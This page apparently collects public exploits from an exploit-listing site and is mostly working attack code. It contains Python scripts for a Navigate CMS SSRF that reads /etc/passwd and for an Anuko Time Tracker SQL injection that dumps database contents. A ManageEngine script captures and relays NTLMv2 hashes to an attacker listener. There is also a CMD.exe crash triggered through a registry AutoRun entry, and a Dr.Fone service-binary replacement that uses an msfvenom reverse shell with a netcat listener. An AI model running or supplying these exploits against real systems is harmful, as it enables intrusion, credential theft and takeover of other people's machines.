Latest exploits :: CodePwn

<pre><code>#!/usr/bin/env python3 # Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) # Exploit Author: cheshireca7 # Vendor Homepage: https://www.navigatecms.com/ # Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download # Version: 2.9.4 and earlier # Tested on: Ubuntu 20.04 # CVE: CVE-2022-28117 # # -*- coding: utf-8 -*- import requests as r, signal from emoji import emojize from argparse import ArgumentParser from sys import exit from requests_toolbelt.multipart.encoder import MultipartEncoder from hashlib import md5 from time import sleep from base64 import b64decode,b64encode from colorama import Fore, Style #proxies = {'http':'http://127.0.0.1:8080'} def handler(signum, frame): print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8'))) exit() def login(): print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...") sleep(1) try: # Grabbing CSRF Token s = r.Session() resp = s.get(f"{args.target}/login.php")#, proxies=proxies) csrf_token = resp.headers['X-Csrf-Token'] # Performing login data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"}) headers = {'Content-Type':data.content_type} resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies) except: print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in") exit(-1) if resp.status_code == 302: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!") for cookie in resp.cookies: if "NVSID" in cookie.name: return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}") else: print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials") exit(-1) def exploit(values): print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...") sleep(1) # Abusing cache feature to retrieve response data = {'limit':'5','language':'en','url':f'{args.payload}'} headers = {'X-Csrf-Token':values[0]} cookies = {values[1].split('=')[0]:values[1].split('=')[1]} resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies) # Retrieving the file with response from static route md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest() resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies) if len(resp.text) > 0: print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...") sleep(1) print(f"\n{resp.text}") exit(0) else: print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received") exit(-1) if __name__ == '__main__': # Define parameters signal.signal(signal.SIGINT, handler) parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)') parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)') parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)') parser.add_argument('-p','--password', required=True, help='Password to log in the CMS') parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate') args = parser.parse_args() exploit(login()) </code></pre>

<pre><code># Exploit Title: Anuko Time Tracker - SQLi (Authenticated) # Date: 2022-05-03 # Exploit Author: Altelus # Vendor Homepage: https://www.anuko.com/ # Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d # Version: Anuko Time Tracker 1.20.0.5640 # Tested on: Linux # CVE : CVE-2022-24707 # An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled. # User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed. # The 'date' parameter is then injected with SQL payload for leaking database contents. from time import time import requests import argparse import re from bs4 import BeautifulSoup from datetime import datetime, timedelta def get_puncher_page(): punch_txt = r_client.get(host + "/puncher.php").text if "Feature is disabled" in punch_txt: print("[-] Puncher feature is disabled.") exit(0) print("[+] Puncher feature is enabled. Picking a project...") soup = BeautifulSoup(punch_txt, features="lxml") time_record_form = soup.find("select", {"name" : "project", "id" : "project"}) project_list = time_record_form.findAll("option") if len(project_list) <= 1: print("[-] No project to choose from") exit(0) f_proj = project_list[1] print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text)) return f_proj['value'] def login(username, password): global r_client data = { "login" : username, "password" : password, "btn_login" : "Login", } login_txt = r_client.post(host + "/login.php", data=data).text if "Incorrect" in login_txt: print("[-] Failed to login. Credentials are not correct.") exit(0) print("[+] Login successful!") def start_puncher(project_id): global r_client data = { "project": project_id, "btn_start": "Start", "browser_today" : "", "browser_time" : "04:00", "date": "{}-{}-{}".format(date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text if "Uncompleted entry already" in start_p: print("[-] A running puncher entry is seen. Exiting") exit(0) print("[*] Puncher started. Getting id added...") puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p) time_edit_ids.sort() latest_id = time_edit_ids[-1].split("=")[1] return latest_id def stop_puncher_sqli(project_id, sqli=""): get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()" if sqli == "": sqli = get_all_tables new_date = date+timedelta(minutes=10) data = { "btn_stop": "Stop", "browser_today" : "", "browser_time" : "04:10", "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text print("[*] Puncher stopped") def get_puncher_result(puncher_id): time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text soup = BeautifulSoup(time_edit_p, features="lxml") note_content = soup.find("textarea", {"name" : "note", "id" : "note"}) print("[+] Leaked: {}".format(note_content.text)) def delete_puncher_entry(puncher_id): data = { "delete_button" : "Delete", "id" : puncher_id } headers = { "Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id) } del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers) print("[*] Puncher {} deleted".format(puncher_id)) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="Anuko Timetracker username") parser.add_argument('--password', required=True, help="Anuko Timetracker password") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables") args = parser.parse_args() r_client = requests.Session() host = args.host date = datetime.now() username = args.username password = args.password login(username, password) proj_id = get_puncher_page() puncher_id = start_puncher(proj_id) sqli="" if args.sqli != None: sqli = args.sqli stop_puncher_sqli(proj_id, sqli=sqli) get_puncher_result(puncher_id) delete_puncher_entry(puncher_id) </code></pre>

<pre><code># Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability # Version: ADSelfService Plus Build < 6121 # Tested against: Build 6118 # CVE: CVE-2022-29457 # !/usr/bin/python3 import argparse import requests import urllib3 import random import sys """ 1- a)Set up SMB server to capture NTMLv2 hash. python3 smbserver.py share . -smb2support b)For relaying to SMB: python3 ntlmrelayx.py -smb2support -t smb://TARGET c)For relaying to LDAP: python3 ntlmrelayx.py -t ldaps://TARGET 2- Fire up the exploit. You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1") parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash') args = parser.parse_args() return args def scheduler(domain, auth, target, listener, user, password): try: with requests.Session() as s: gUrl = target getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False) csrf = getCsrf.cookies['_zcsr_tmp'] print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp']) if auth.lower() == 'adselfservice': auth = "ADSelfService Plus Authentication" data = { "loginName": user, "domainName": auth, "j_username": user, "j_password": password, "AUTHRULE_NAME": "ADAuthenticator", "adscsrf": [csrf, csrf] } #Login url = target + "j_security_check" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) #Auth Check url2 = target + "webclient/index.html" req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False) if req2.status_code == 200: print("[+] Authentication is successful.") elif req2.status_code == 302: print("[-] Login failed.") sys.exit(1) else: print("[-] Something went wrong") sys.exit(1) dn = domain.split(".") r1 = random.randint(1, 1000) surl = target + 'ServletAPI/Reports/saveReportScheduler' data = { 'SCHEDULE_ID':'0', 'ADMIN_STATUS':'3', 'SCHEDULE_NAME': 'enrollment' + str(r1), 'DOMAINS': '["'+ domain +'"]', 'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}', 'SELECTED_REPORTS': '104,105', 'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]', 'SCHEDULE_TYPE': 'hourly', 'TIME_OF_DAY': '0', 'MINS_OF_HOUR': '5', 'EMAIL_ID': user +'@'+ domain, 'NOTIFY_ADMIN': 'true', 'NOTIFY_MANAGER': 'false', 'STORAGE_PATH': '\\\\' + listener + '\\share', 'FILE_FORMAT': 'HTML', 'ATTACHMENT_TYPE': 'FILE', 'ADMIN_MAIL_PRIORITY': 'Medium', 'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub', 'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html', 'MANAGER_FILE_FORMAT': 'HTML', 'MANAGER_ATTACHMENT_TYPE': 'FILE', 'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub', 'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html', 'adscsrf': csrf } sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False) if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text: print('[-] The target is patched!') sys.exit(1) if sch.status_code == 200: print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!") else: print("[-] Something went wrong. Please, try it manually!") sys.exit(1) except: print('[-] Connection error!') def main(): arg = get_args() domain = arg.domain auth = arg.auth user = arg.user password = arg.password target = arg.target listener = arg.listener scheduler(domain, auth, target, listener, user, password) if __name__ == "__main__": main() </code></pre>

<pre><code>Hi @ll, the subject says it all: a 25 year old TRIVIAL signed integer arithmetic bug (which may well have earned a PhD now) crashes Windows' command interpreter CMD.exe via its builtin SET command. See their documentation: <https://technet.microsoft.com/en-us/library/cc771320.aspx> <https://technet.microsoft.com/en-us/library/cc754250.aspx> Classification ~~~~~~~~~~~~~~ <https://cwe.mitre.org/data/definitions/190.html> CWE-190: Integer Overflow or Wraparound <https://cwe.mitre.org/data/definitions/248.html> CWE-248: Uncaught Exception Demonstration ~~~~~~~~~~~~~ On Windows NT4 or any newer version start the command interpreter and run the following 4 command lines (the first 3 set just the base): SET /A -2147483648 SET /A ~2147483647 SET /A ~2147483647 / -1 SET /A ~2147483647 % -1 [1] Oops: although a valid signed 32-bit integer, the command interpreter reports the literal value -2147483648 = 2**31 alias INT_MIN as "Invalid number. Numbers are limited to 32-bits of precision." [2] As expected, ~2147483647, the negation of INT_MAX, yields INT_MIN [3] Also as expected, computing the quotient of INT_MIN / -1 produces "Invalid number. Numbers are limited to 32-bits of precision.": the correct result is +2147483648 alias INT_MAX + 1, i.e. produces a integer overflow, which raises a #DE (divide error) exception on x86/x64 processors (and their 8- and 16-bit predecessors too). [4] OUCH: rather unexpected, computing the remainder of INT_MIN / -1 crashes the command processor with the #DE exception, i.e. the developers failed to implement the check they used for division. JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1 is (by the algebraic definition of division) 0 (in words: ZERO): the remainder is in magnitude less than the divisor. The only integer that is in magnitude less than |-1| = 1 is 0! Exploit ~~~~~~~ Setting one or both of the following documented registry entries crashes the command interpreter upon invocation (unless started with the switch /D): [HKEY_CURRENT_USER\Software\Microsoft\Command Processor] "AutoRun"="SET /A ~2147483647 % ~0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor] "AutoRun"="SET /A ~2147483647 % ~0" stay tuned Stefan Kanthak PS: I reported this bug as DoS to the MSRC; they replied with the following bullshit statement in their 2nd sentence: | Though engineering confirmed the crash in this case, it was assessed | as a Low severity DoS. | Their reasoning centers around the requirement to have admin | privileges to pull off the attack. OUCH! Unprivileged users can but write this registry entry below [HKEY_CURRENT_USER\Software\Microsoft\Command Processor] </code></pre>

<pre><code># Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions # Date: 04/25/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://drfone.wondershare.com/ # Software Link: https://download.wondershare.com/drfone_full3360.exe # Version: 11.4.10 # Tested on: Windows 10 64-bit # Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website) # Description: The application "Wondershare Dr. Fone" comes with 3 services: 1. DFWSIDService 2. ElevationService 3. Wondershare InstallAssist All the folders that contain the binaries for the services have weak permissions. These weak permissions allow any authenticated user to get SYSTEM privileges. First, we need to check if services are running using the following command: wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running Now we need to check if we have enough privileges to replace the binaries: icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone" Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit) ... icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps" Everyone:(I)(OI)(CI)(F) <= same here ... icacls "C:\ProgramData\Wondershare\Service" Everyone:(I)(OI)(CI)(F) <= and here ... # Proof of Concept: 1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help") 2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\) 3. After replacing the binary, wait the next reboot (unless the service can be restarted manually) As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener: simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe listener: nc -nlvp <YOUR_PORT> </code></pre>